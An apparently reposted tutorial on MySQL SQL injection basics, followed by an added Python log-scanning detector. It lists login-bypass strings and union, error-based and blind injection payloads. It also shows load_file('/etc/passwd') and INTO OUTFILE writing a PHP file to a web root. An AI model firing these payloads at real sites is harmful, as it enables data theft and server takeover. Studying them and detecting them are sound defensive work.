SQL Injection Essential Basics

Source: Internet
Author: User
Tags: rand, sleep, sql injection, sql injection attack

What is SQL injection

A SQL injection attack occurs when an attacker inserts SQL syntax into the input field of a web form, or into the query string of a page request, and tricks the server into executing a malicious SQL command. Forms that use user-entered content directly to construct (or influence) dynamic SQL commands, or that pass it as input parameters to stored procedures, are particularly vulnerable to SQL injection.

MySQL common comment sequences

#

-- (followed by a space) or --+

/*...*/

Note that during an injection these comment sequences may need to be URL-encoded.

MySQL authentication bypass

;%00

' or 1=1 #

'/*!or*/ 1=1--+

MySQL connectors

The + operator can be used as a connector in MySQL:

SELECT * FROM users WHERE username='zhangsan' AND 'ab'='a'+'b';
# MySQL evaluates + numerically: 'a'+'b' becomes 0, and 'ab' also casts to 0, so the comparison holds

Common functions in MySQL

During SQL injection, MySQL's built-in functions are used. They fall into two groups: information functions and functional functions.

Information functions obtain information about the MySQL database; functional functions are traditional functions used to carry out an operation.

The commonly used information functions are:

database(): returns the name of the database currently in use

version(): returns the database version, equivalent to @@version

user(): returns the current user, equivalent to CURRENT_USER. For example:

SELECT user();        # root@localhost
SELECT current_user;  # root@localhost

@@datadir: the location where the database files are stored.

SELECT @@datadir; # D:\xampp\mysql\data\

The common functional functions are:

load_file(): loads a file from the database server and returns its contents.

SELECT * FROM users UNION SELECT 1, load_file('/etc/passwd'), 3;
SELECT * FROM users UNION SELECT 1, load_file(0x2f6574632f706173737764), 3; # the hex form of the path avoids single quotes

into outfile: writes to a file, provided the database user has write permission.

SELECT '<?php phpinfo(); ?>' INTO OUTFILE '/var/www/html/xxx.php';
SELECT char(60,63,112,104,112,32,112,104,112,105,110,102,111,40,41,59,32,63,62) INTO OUTFILE '/var/www/html/xxx.php'; # the same content built with char() to avoid quotes

concat(): returns the string formed by joining its arguments. If any argument is NULL, the result is NULL.

Usage is as follows:

SELECT concat(username, password) FROM users;

concat_ws(): a special form of concat(); the first parameter is the separator and the remaining parameters are the field names.

SELECT concat_ws(',', username, password) FROM users;

group_concat(): merges the results from multiple records into one string.

Usage is as follows:

SELECT group_concat(username) FROM users;
# returns every username in the users table, as a single record

substring(), also written substr(): extracts part of a string. Usage: substr(str,pos,length). Note that pos starts at 1.

SELECT substr((SELECT database()), 1, 1);

ascii(): returns the ASCII value of a character.

SELECT ascii('a'); # 97

length(): returns the length of a string.

For example:

SELECT length('123456'); # returns 6

if(exp1,exp2,exp3): returns exp2 if the expression exp1 is true, otherwise returns exp3.

For example:

SELECT 1, 2, if(1=1, 3, -1); # 1,2,3
SELECT 1, 2, if(1=2, 3, -1); # 1,2,-1

These are the functions commonly used in SQL injection. There are of course many other functions that are used less often:

now(): returns the current system time

hex(): returns the hexadecimal representation of a string

unhex(): the reverse of hex(), converts a hexadecimal string back

@@basedir: the MySQL installation directory

@@version_compile_os: the operating system

MySQL database meta-information

MySQL has an information database, information_schema, which stores information about all the other databases on the server: database names, tables, column names, access rights, and so on. The commonly used information_schema tables are:

schemata: stores information about every database in MySQL; its contents match the result of show databases.

tables: stores information about the tables in each database, describing in detail which schema a table belongs to, its table type and its engine. The result of show tables from security comes from this table.

columns: describes all the columns of each table and the information about each column. show columns from users is drawn from this table.

The following uses the three tables above to obtain information about the database.

SELECT database(); # current database
SELECT schema_name FROM information_schema.schemata LIMIT 0,1; # query databases
SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1; # query tables
SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 0,1; # query columns

SQL injection types

SQL injection can be roughly divided into regular SQL injection and blind SQL injection. Blind injection can in turn be divided into time-based blind injection and blind injection based on web content.
There are many explanations of blind injection on the internet, so it is not explained at length here; the specific examples below illustrate the concept.
In time-delay injection, the commonly used functions are if() and sleep().

The basic SQL expressions are as follows:

SELECT * FROM users WHERE id=1 AND if(length(user())=14, sleep(3), 1);
SELECT * FROM users WHERE id=1 AND if(mid(user(),1,1)='r', sleep(3), 1);

Wide-byte injection

For wide-byte injection, refer to the detailed wide-byte injection write-up. Wide-byte injection is typically caused by a mismatch between the page encoding and the database encoding; %D5 or %DF is used for the bypass.

MySQL common statement summary

General injection

1' ORDER BY NUM # determine the number of columns
1' UNION SELECT 1,2,3 # determine the number of columns
-1' UNION SELECT 1,2,3 # determine which columns are displayed on the page
-1' UNION SELECT 1,2,group_concat(schema_name) FROM information_schema.schemata # list all databases in MySQL
-1' UNION SELECT 1,2,group_concat(table_name) FROM information_schema.tables WHERE table_schema="dbname"/database()/hex(dbname) #
-1' UNION SELECT 1,2,column_name FROM information_schema.columns WHERE table_name="table_name" LIMIT 0,1 #
-1' UNION SELECT 1,2,group_concat(column_name) FROM information_schema.columns WHERE table_name="table_name"/hex(table_name) LIMIT 0,1 #
-1' UNION SELECT 1,2,3 AND '1'='1    (used when a comment character is not available)

Double query injection

SELECT concat(0x3a,0x3a,(SELECT database()),0x3a,0x3a);
SELECT concat(0x3a,0x3a,(SELECT database()),0x3a,0x3a,floor(rand()*2)) a FROM information_schema.tables;
SELECT count(*), concat(0x3a,0x3a,(SELECT database()),0x3a,0x3a,floor(rand()*2)) a FROM information_schema.tables GROUP BY a; # this form of statement is commonly used in blind SQL injection to get information about the database
SELECT count(*), concat(0x3a,0x3a,(SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1),0x3a,0x3a,floor(rand()*2)) a FROM information_schema.tables GROUP BY a; # gets the table information of the database
# The injection form is as follows:
1' AND (SELECT 1 FROM (SELECT count(*), concat(0x3a,0x3a,(SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1),0x3a,0x3a,floor(rand()*2)) a FROM information_schema.tables GROUP BY a) b) --+

This technique obtains the required information from the error message MySQL produces when it executes the SQL command; a later article will analyse how it is written in detail.

Boolean blind injection

1' AND ascii(substr((SELECT database()),1,1))>99
1' AND ascii(substr((SELECT table_name FROM information_schema.tables LIMIT 0,1),1,1))>90

Boolean blind injection infers information from the difference in page content when the SQL condition evaluates to true versus false.

Time-based blind injection

1' AND if((SELECT substr(table_name,1,1) FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1)='e', sleep(10), NULL) --+
1' AND if(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1),1,1)='e', sleep(10), NULL) --+

The two statements above are equivalent. Time-based blind injection differs from regular SQL injection: it generally needs the if() and sleep() functions, and whether sleep() executed is judged from how long the page takes to return its content.

The required information is then obtained from whether or not sleep() executed.
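As an added example (not from the original article), a small detector written from the defender's side: it URL-decodes the query string of constructed access-log lines and flags the indicators this article describes, namely union/information_schema enumeration, sleep()-based timing probes, floor(rand()) error-based probes, load_file/into outfile, ascii/substr boolean probes and trailing comment sequences. The log format and sample requests are assumptions.

```python
import re
from urllib.parse import unquote, unquote_plus

# Indicator patterns derived from the techniques described in this article.
INDICATORS = {
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "information_schema": re.compile(r"\binformation_schema\."),
    "time_based": re.compile(r"\bsleep\s*\("),
    "error_based_rand": re.compile(r"floor\s*\(\s*rand\s*\("),
    "file_access": re.compile(r"\b(load_file\s*\(|into\s+outfile\b)"),
    "comment_terminator": re.compile(r"(--\s|--\+|#|/\*!?)\s*$"),
    "bool_inference": re.compile(r"\b(ascii|substr|substring|mid)\s*\("),
}

def analyze_request(query_string):
    """Return the sorted indicator names that fire on one request's query string."""
    # First pass decodes %xx and '+'; the second pass catches double-encoded payloads.
    decoded = unquote(unquote_plus(query_string)).lower()
    return sorted(name for name, rx in INDICATORS.items() if rx.search(decoded))

# Constructed access-log lines (not from the article): one benign request, then the
# article's enumeration, time-based and boolean probes, URL-encoded as a client sends them.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01] "GET /item.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:02] "GET /item.php?id=-1%27+union+select+1%2C2%2C'
    'group_concat%28schema_name%29+from+information_schema.schemata%23 HTTP/1.1" 200 733',
    '10.0.0.9 - - [01/Jan/2024:10:00:03] "GET /item.php?id=1%27+and+if%28length%28user%28'
    '%29%29%3D14%2Csleep%283%29%2C1%29--%2B HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:04] "GET /item.php?id=1%27+and+ascii%28substr%28%28'
    'select+database%28%29%29%2C1%2C1%29%29%3E99%23 HTTP/1.1" 200 512',
]

# Common-log-format line: client address, then the request line with its query string.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) \S+?\?(\S+) HTTP')

def scan_log(lines):
    """Return (client_ip, indicators) for each request that trips at least one indicator."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        indicators = analyze_request(m.group(2))
        if indicators:
            hits.append((m.group(1), indicators))
    return hits

if __name__ == "__main__":
    for ip, indicators in scan_log(SAMPLE_LOG):
        print(ip, ", ".join(indicators))
```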

Summary

This covers the basic knowledge of SQL injection; the next article will explain SQL injection in more detail, while this one is primarily about the fundamentals. Readers interested in SQL injection are welcome to keep following the community.
